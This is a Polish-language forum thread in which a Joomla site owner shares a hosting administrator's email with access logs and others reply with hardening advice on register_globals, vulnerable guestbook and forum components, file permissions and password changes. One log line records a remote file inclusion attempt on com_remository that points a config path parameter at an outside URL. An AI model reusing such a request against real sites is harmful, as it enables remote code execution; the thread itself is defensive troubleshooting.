Witam, dziś nastąpił problem z działaniem naszego portalu, który używa Joomli, od administratora dostałem następującego maila.


Witam

62.105.75.32 - - [28/Jan/2008:16:12:47 +0100] "GET
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kadausa.org/login?
HTTP/1.1" 200 46 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
213.238.65.223 - - [28/Jan/2008:18:53:52 +0100] "GET
/index.php?option=com_frontpage&Itemid=55&limit=13&limitstart=156 HTTP/1.1"
200 13136
"http://images.google.pl/imgres?imgurl=http://img398.imageshack.us/img398/8250/cskm4.jpg&imgrefurl=http://csinfo.pl/index.php%3Foption%3Dcom_frontpage%26Itemid%3D55%2 6limit%3D13%26limitstart%3D156&h=120&w=400&sz=12&hl=pl&start=88&tbnid=WN84ch_VSUk3MM:&tbnh=37&tbnw=124&prev=/images%3Fq%3Dcounter%2Bstrike%2B1.5%26start%3D72%2 6gbv%3D2%26ndsp%3D18%26svnum%3D10%26hl%3Dpl%26sa%3 DN"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; MEGAUPLOAD 1.0; .NET
CLR 1.1.4322)"
213.238.65.223 - - [28/Jan/2008:18:54:04 +0100] "GET
/index.php?option=com_frontpage&Itemid=55&limit=13&limitstart=156 HTTP/1.1"
200 13138
"http://images.google.pl/imgres?imgurl=http://img398.imageshack.us/img398/8250/cskm4.jpg&imgrefurl=http://csinfo.pl/index.php%3Foption%3Dcom_frontpage%26Itemid%3D55%2 6limit%3D13%26limitstart%3D156&h=120&w=400&sz=12&hl=pl&start=88&tbnid=WN84ch_VSUk3MM:&tbnh=37&tbnw=124&prev=/images%3Fq%3Dcounter%2Bstrike%2B1.5%26start%3D72%2 6gbv%3D2%26ndsp%3D18%26svnum%3D10%26hl%3Dpl%26sa%3 DN"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; MEGAUPLOAD 1.0; .NET
CLR 1.1.4322)"


Strona csinfo.pl ma dziury i sa probu ataku i potem mamy spam albo odpalone
procesy na Pana koncie z jakimic hakerskimi rzeczami

Prosimy o pomoc.

* przede wszystkim wyłącz register_globals
* w ostatnich wersjach w pliku .htacces jest blokowanie takich wywołań

Dodam jeszcze: sprawdź w tabelach bazy danych, gdzie masz wpisy zrobione przez roboty spamujące. Wykryj innymi słowy dziurawe komponenty.
Nalezy do nich m.in. starsze joomlaboard, AkoComment, AkoBook, GarysCoocBook,PoepleBook. Potencjalnie każdy, wq którym można dokonywac wpisów, każdy starszy, który nie działa poprawnie przy wyłaczonych register globals.
Widziałem tabelę wpisów w Joomlaboard z 800 000 wpisów robotów! Serwer padał co rusz!

Ze swej strony dodam jeszcze chmody ograniczone do minimum (pliki 644 i katalogi 755) i zmiana haseł adminów i superadminów.